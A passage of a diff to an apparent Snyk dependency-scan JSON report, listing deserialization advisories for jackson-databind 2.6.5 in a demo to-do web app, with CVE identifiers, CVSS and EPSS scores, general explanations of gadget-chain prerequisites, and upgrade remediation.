"[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", + "title": "GitHub Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + 
"modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.120318Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.85805", + "probability": "0.01269", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14719" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-4gq5-ch57-c2mg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:23:45.326350Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:22:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:22:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.823657Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:46:43.143163Z" + 
}, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "cvssV3BaseScore": 6.8, + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.565013Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.85710", + "probability": "0.01257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14721" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9mxf-g3x6-wv74" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:25:40.161831Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:24:46Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:24:39Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.774444Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + 
"assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.690019Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19362" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c8hm-7hpq-7jhg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:19.256477Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.043196Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.593938Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19360" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f9hv-mg5h-xcw9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:23.673097Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:34.457712Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
